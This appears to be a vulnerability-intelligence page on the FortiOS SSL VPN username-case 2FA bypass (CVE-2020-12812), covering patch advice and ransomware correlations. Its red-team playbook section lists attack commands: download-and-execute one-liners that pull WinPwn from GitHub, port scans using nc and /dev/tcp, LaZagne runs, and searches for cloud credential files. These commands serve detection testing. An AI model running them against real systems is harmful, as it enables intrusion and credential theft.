CVE-2020-12812
Overview
This vulnerability is an authentication bypass caused by improper handling of username case sensitivity in the SSL VPN component of Fortinet FortiOS. The authentication mechanism fails to enforce FortiToken second-factor verification when the username's case is altered. Affected versions include FortiOS 6.4.0, 6.2.0 to 6.2.3, and 6.0.9 and earlier, specifically within the SSL VPN authentication workflow.
Vulnerability Description
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
Impact
An attacker can gain full SSL VPN access without providing the required second-factor authentication by simply modifying the case of their username. This bypass requires only valid primary credentials and no additional user interaction. Successful exploitation grants unauthorized access to the VPN environment, potentially exposing sensitive internal resources and enabling lateral movement within the network.
Solution
Fortinet has released patches addressing this authentication bypass in FortiOS versions 6.4.1 and later, 6.2.4 and later, and 6.0.10 and later. Administrators should apply the updates as detailed in the Fortinet advisory FG-IR-19-283 available at https://fortiguard.com/psirt/FG-IR-19-283. No specific workarounds are recommended; timely patching is the primary remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Iranian IRGC Data Extortion Operations
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
An improper authentication vulnerability exists within the SSL VPN feature of specific versions of FortiOS, primarily affecting the authentication process when users attempt to log in. This flaw allows an attacker to bypass the second factor of authentication, specifically the FortiToken, by manipulating the case of their username. The underlying issue arises from the system's failure to properly normalize or validate the username input, leading to a scenario where different case representations of the same username are treated as distinct entries. As a result, an attacker could exploit this vulnerability to gain unauthorized access to sensitive systems and data, undermining the integrity of the authentication process.
The attack vector for this vulnerability is relatively straightforward, as it primarily involves the login interface of the SSL VPN. An attacker with knowledge of a valid username can attempt to log in using a variant of that username, altering the case of the characters. If the system does not correctly handle this case sensitivity, the attacker may successfully authenticate without being prompted for the second factor of authentication. This exploitation scenario can occur remotely, making it particularly dangerous, as it does not require physical access to the target system. The simplicity of the attack method increases the likelihood of exploitation, especially in environments where users may have weak password hygiene or where the second factor is not consistently enforced.
The real-world impact of this vulnerability is significant, particularly for organizations relying on FortiOS for secure remote access. Successful exploitation could lead to unauthorized access to corporate networks, potentially allowing attackers to exfiltrate sensitive data, deploy malware, or conduct further attacks within the network. The business risks associated with such breaches include financial losses, reputational damage, and potential legal ramifications stemming from non-compliance with data protection regulations. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust and confidence in their security practices.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to ensure that all affected versions of FortiOS are updated to the latest patches provided by Fortinet, which address this authentication flaw. Regularly auditing user accounts and access logs can help identify any unusual login attempts, particularly those involving case variations in usernames. Additionally, organizations should consider implementing more robust authentication mechanisms, such as requiring users to utilize unique usernames that are not easily guessable or employing additional layers of security, such as IP whitelisting or behavioral analytics, to detect anomalous access patterns.
In conclusion, the improper authentication vulnerability in FortiOS presents a critical risk to organizations utilizing this platform for secure remote access. The potential for unauthorized access through a simple manipulation of username case underscores the importance of rigorous authentication processes and the need for continuous monitoring and updating of security measures. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against the threats posed by this vulnerability and enhance their overall cybersecurity posture.
Recent developments indicate a significant elevation in the threat profile of CVE-2020-12812. The vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog formalizes its recognition as a critical security risk requiring prioritized attention. Concurrently, the CVSS score has been updated from zero to 9.8, reflecting a reassessment of its exploitability and impact severity. Our telemetry reveals a substantial emergence of this vulnerability within the Exploit Prediction Scoring System (EPSS), now scoring 0.4850, placing it near the top percentile for exploitation likelihood. Notably, multiple ransomware groups—including Iranian IRGC Data Extortion Operations, akira, ransomhub, and UNC3886—have been linked to campaigns leveraging this vulnerability, underscoring its operationalization in high-impact extortion activities. Although no new exploit techniques have been detected, the convergence of these factors signals an elevated risk environment. For defenders, this means that CVE-2020-12812 is no longer a theoretical concern but an actively exploited vector in ransomware campaigns, demanding heightened vigilance. The risk assessment must be adjusted to reflect a critical and imminent threat, with increased potential for unauthorized access and subsequent data compromise in affected FortiOS deployments.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | 6.4.0 |
cpe:2.3:o:fortinet:fortios:6.4.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-12812 |
| fortiguard.com |
GitHub CVE
x_refsource_MISC
|
https://fortiguard.com/psirt/FG-IR-19-283 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-12812 |